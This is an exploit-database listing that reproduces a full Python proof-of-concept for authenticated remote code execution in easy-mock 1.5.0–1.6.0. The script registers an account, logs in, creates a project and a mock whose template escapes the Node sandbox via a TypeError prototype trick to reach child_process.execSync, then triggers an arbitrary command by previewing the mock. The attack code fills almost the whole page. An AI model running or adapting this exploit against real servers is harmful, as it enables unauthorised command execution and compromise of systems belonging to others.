Exploit for Easy-Mock 1.6.0 Remote Code Execution

Name: Exploit for Easy-Mock 1.6.0 Remote Code Execution
Rating: 5 (392 reviews)
2021-08-13 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:163814
# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)  
# Date: 12/08/2021  
# Exploit Author: LionTree  
# Vendor Homepage: https://github.com/easy-mock  
# Software Link: https://github.com/easy-mock/easy-mock  
# Version: 1.5.0-1.6.0  
# Tested on: windows 10(node v8.17.0)  
  
import requests  
import json  
import random  
import string  
  
target = 'http://127.0.0.1:7300'  
username = ''.join(random.sample(string.ascii_letters + string.digits, 8))  
password = ''.join(random.sample(string.ascii_letters + string.digits, 8))  
print(username)  
print(password)  
# can't see the result of command  
cmd = 'calc.exe'  
  
# register  
url = target + "/api/u/register"  
cookies = {"SSO_LANG_V2": "EN"}  
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}  
json_data={"name": username, "password": password}  
requests.post(url, headers=headers, cookies=cookies, json=json_data)  
  
# login  
url = target + "/api/u/login"  
cookies = {"SSO_LANG_V2": "EN"}  
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}  
json_data={"name": username, "password": password}  
req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text  
login = json.loads(req)  
token = login['data']['token']  
  
# create project  
url = target + "/api/project/create"  
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}  
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}  
json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}  
requests.post(url, headers=headers, cookies=cookies, json=json_data)  
  
# get project_id  
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"  
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}  
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}  
req = requests.get(url, headers=headers, cookies=cookies).text  
projects = json.loads(req)  
project_id = projects['data'][0]['_id']  
  
# create mock  
url = target + "/api/mock/create"  
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}  
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}  
json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username}  
requests.post(url, headers=headers, cookies=cookies, json=json_data)  
  
# preview mock  
url = target + "/mock/{}/{}/{}".format(project_id,username,username)  
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}  
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}  
requests.get(url, headers=headers, cookies=cookies)